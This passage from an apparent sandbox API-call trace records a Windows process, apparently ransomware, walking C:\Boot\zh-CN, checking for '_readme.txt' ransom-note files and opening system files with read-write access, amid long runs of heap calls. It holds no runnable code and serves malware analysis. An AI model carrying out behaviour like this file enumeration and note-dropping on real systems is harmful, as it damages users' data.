lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.838] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.838] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.838] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.838] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.838] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.838] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.838] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.838] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.838] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.839] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.839] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.839] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.839] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.839] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.839] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.839] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.839] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.840] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.840] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.841] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.841] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.841] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.841] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.841] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.841] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.841] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.841] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.841] PathFindFileNameW (pszPath="") returned="" [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.841] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.841] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.841] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.841] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.841] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.842] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0146.842] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.842] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0146.842] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.842] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.842] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.842] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.842] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.842] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0146.842] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.843] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.843] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.843] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.843] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned=".txt" [0146.843] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.843] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.843] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.843] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.843] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.843] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.843] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.843] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.844] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.844] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.845] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.845] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.846] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.846] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.846] RtlAllocateHeap 